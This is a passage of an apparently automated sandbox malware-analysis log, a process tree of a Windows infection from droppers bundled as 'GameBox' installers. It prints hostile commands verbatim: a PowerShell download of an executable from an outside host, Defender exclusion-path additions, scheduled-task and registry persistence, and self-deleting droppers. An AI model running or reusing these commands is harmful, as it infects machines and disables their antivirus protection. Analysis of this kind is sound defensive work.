                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                                                                4⤵
                                                                                • Blocklisted process makes network request
                                                                                PID:3824
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                                                                4⤵
                                                                                  PID:10128
                                                                                  • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                    5⤵
                                                                                      PID:1324
                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                        6⤵
                                                                                        • Blocklisted process makes network request
                                                                                        PID:9764
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                          7⤵
                                                                                            PID:4248
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                            7⤵
                                                                                              PID:7364
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                              7⤵
                                                                                                PID:8476
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                7⤵
                                                                                                  PID:10092
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                6⤵
                                                                                                  PID:8144
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                    7⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    PID:8648
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                                      8⤵
                                                                                                        PID:4888
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                                          9⤵
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:4992
                                                                                                      • C:\Windows\system32\services32.exe
                                                                                                        "C:\Windows\system32\services32.exe"
                                                                                                        8⤵
                                                                                                          PID:5296
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                            9⤵
                                                                                                              PID:9320
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                10⤵
                                                                                                                  PID:10060
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                  10⤵
                                                                                                                    PID:8816
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                    10⤵
                                                                                                                      PID:8244
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                      10⤵
                                                                                                                        PID:10184
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                                                      9⤵
                                                                                                                        PID:6372
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                                                          10⤵
                                                                                                                          • Drops file in System32 directory
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                          PID:4992
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                                                            11⤵
                                                                                                                              PID:1332
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                12⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Adds Run key to start application
                                                                                                                                PID:3976
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                                                                12⤵
                                                                                                                                • Creates scheduled task(s)
                                                                                                                                PID:8968
                                                                                                                            • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                                                                                                                              "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                                                                                                                              11⤵
                                                                                                                                PID:10192
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                                                                11⤵
                                                                                                                                  PID:8476
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    12⤵
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    PID:9408
                                                                                                                                  • C:\Windows\system32\choice.exe
                                                                                                                                    choice /C Y /N /D Y /T 3
                                                                                                                                    12⤵
                                                                                                                                      PID:4148
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                                                              8⤵
                                                                                                                                PID:7204
                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  9⤵
                                                                                                                                    PID:8304
                                                                                                                                  • C:\Windows\system32\choice.exe
                                                                                                                                    choice /C Y /N /D Y /T 3
                                                                                                                                    9⤵
                                                                                                                                      PID:1308
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                                                                                            4⤵
                                                                                                                              PID:9336
                                                                                                                              • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                                                                                                5⤵
                                                                                                                                • Adds Run key to start application
                                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                                PID:4312
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
                                                                                                                              4⤵
                                                                                                                                PID:6560
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                                                                                                                                  5⤵
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:7508
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                    "{path}"
                                                                                                                                    6⤵
                                                                                                                                      PID:5164
                                                                                                                            • C:\Users\Admin\Documents\SKTsnAXG8vvHmLG5XEfEC9OK.exe
                                                                                                                              "C:\Users\Admin\Documents\SKTsnAXG8vvHmLG5XEfEC9OK.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5108
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-J2ASL.tmp\SKTsnAXG8vvHmLG5XEfEC9OK.tmp
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-J2ASL.tmp\SKTsnAXG8vvHmLG5XEfEC9OK.tmp" /SL5="$40210,138429,56832,C:\Users\Admin\Documents\SKTsnAXG8vvHmLG5XEfEC9OK.exe"
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                PID:4728
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-G3D4G.tmp\Setup.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-G3D4G.tmp\Setup.exe" /Verysilent
                                                                                                                                  4⤵
                                                                                                                                    PID:5324
                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:5544
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5544 -s 760
                                                                                                                                        6⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:6832
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5544 -s 820
                                                                                                                                        6⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:6748
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5544 -s 736
                                                                                                                                        6⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:8
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5544 -s 828
                                                                                                                                        6⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:7284
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5544 -s 956
                                                                                                                                        6⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:7932
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5544 -s 984
                                                                                                                                        6⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:2292
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5544 -s 1420
                                                                                                                                        6⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:492
                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                                                      5⤵
                                                                                                                                        PID:5568
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-0FHK1.tmp\Inlog.tmp
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-0FHK1.tmp\Inlog.tmp" /SL5="$1030C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                          PID:5756
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-J9399.tmp\Setup.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-J9399.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                            7⤵
                                                                                                                                              PID:7648
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-MMTSS.tmp\Setup.tmp
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-MMTSS.tmp\Setup.tmp" /SL5="$60486,17369807,721408,C:\Users\Admin\AppData\Local\Temp\is-J9399.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                8⤵
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                PID:8028
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-CANFK.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                                                                  9⤵
                                                                                                                                                    PID:7364
                                                                                                                                                    • C:\Windows\SysWOW64\expand.exe
                                                                                                                                                      expand C:\Users\Admin\AppData\Local\Temp\is-CANFK.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                                                                      10⤵
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      PID:8112
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                                    9⤵
                                                                                                                                                      PID:8996
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                                        10⤵
                                                                                                                                                          PID:7320
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                                                                        9⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                        PID:8528
                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          10⤵
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          PID:7312
                                                                                                                                                      • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                                                                        "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                                                                        9⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:7528
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-CANFK.tmp\{app}\vdi_compiler.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-CANFK.tmp\{app}\vdi_compiler"
                                                                                                                                                        9⤵
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                        PID:4400
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-CANFK.tmp\{app}\vdi_compiler.exe"
                                                                                                                                                          10⤵
                                                                                                                                                            PID:9796
                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                              ping localhost -n 4
                                                                                                                                                              11⤵
                                                                                                                                                              • Runs ping.exe
                                                                                                                                                              PID:10132
                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                                                                                  5⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                  PID:5596
                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282279 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:6232
                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:5652
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-067K4.tmp\VPN.tmp
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-067K4.tmp\VPN.tmp" /SL5="$10324,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                      6⤵
                                                                                                                                                        PID:6004
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-DOH83.tmp\Setup.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-DOH83.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                          7⤵
                                                                                                                                                            PID:4608
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-7G114.tmp\Setup.tmp
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-7G114.tmp\Setup.tmp" /SL5="$4046E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-DOH83.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                              8⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                              PID:6972
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                9⤵
                                                                                                                                                                  PID:7808
                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                    tapinstall.exe remove tap0901
                                                                                                                                                                    10⤵
                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                    PID:8080
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:6852
                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                      tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:4400
                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                      9⤵
                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                      PID:8480
                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                      9⤵
                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                      PID:8272
                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                                                                              5⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:5744
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:6292
                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                    PID:6420
                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                PID:5696
                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:5624
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-KUIP8.tmp\WEATHER Manager.tmp
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-KUIP8.tmp\WEATHER Manager.tmp" /SL5="$1031A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                  PID:5964
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-DAV05.tmp\Setup.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-DAV05.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    PID:6888
                                                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-DAV05.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-DAV05.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282279 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:6596
                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:5824
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-N65I3.tmp\MediaBurner2.tmp
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-N65I3.tmp\MediaBurner2.tmp" /SL5="$10344,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:4672
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-81CET.tmp\3377047_logo_media.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-81CET.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                      PID:5764
                                                                                                                                                                      • C:\Program Files\Google\GJIHKYXKGB\ultramediaburner.exe
                                                                                                                                                                        "C:\Program Files\Google\GJIHKYXKGB\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:7076
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-6SQGS.tmp\ultramediaburner.tmp
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-6SQGS.tmp\ultramediaburner.tmp" /SL5="$203C0,281924,62464,C:\Program Files\Google\GJIHKYXKGB\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                            9⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                            PID:6004
                                                                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                              10⤵
                                                                                                                                                                                PID:1296
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\e9-06704-e1a-c40b8-31a9050a57d5b\Qocuqabitu.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\e9-06704-e1a-c40b8-31a9050a57d5b\Qocuqabitu.exe"
                                                                                                                                                                            8⤵
                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                            PID:6448
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\d5-94fff-532-304b2-025dac0586899\Fotimubaehy.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\d5-94fff-532-304b2-025dac0586899\Fotimubaehy.exe"
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:6540
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\14o0sbdf.aih\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                9⤵
                                                                                                                                                                                  PID:9052
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\14o0sbdf.aih\GcleanerEU.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\14o0sbdf.aih\GcleanerEU.exe /eufive
                                                                                                                                                                                    10⤵
                                                                                                                                                                                      PID:2212
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w0jpl2dr.qbu\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                    9⤵
                                                                                                                                                                                      PID:7328
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\w0jpl2dr.qbu\installer.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\w0jpl2dr.qbu\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                        10⤵
                                                                                                                                                                                          PID:8880
                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g11z0ffm.tm5\ufgaa.exe & exit
                                                                                                                                                                                        9⤵
                                                                                                                                                                                          PID:8304
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lpvgbmbg.0eh\anyname.exe & exit
                                                                                                                                                                                          9⤵
                                                                                                                                                                                            PID:8352
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lpvgbmbg.0eh\anyname.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\lpvgbmbg.0eh\anyname.exe
                                                                                                                                                                                              10⤵
                                                                                                                                                                                                PID:8680
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lpvgbmbg.0eh\anyname.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\lpvgbmbg.0eh\anyname.exe" -q
                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                    PID:7960
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
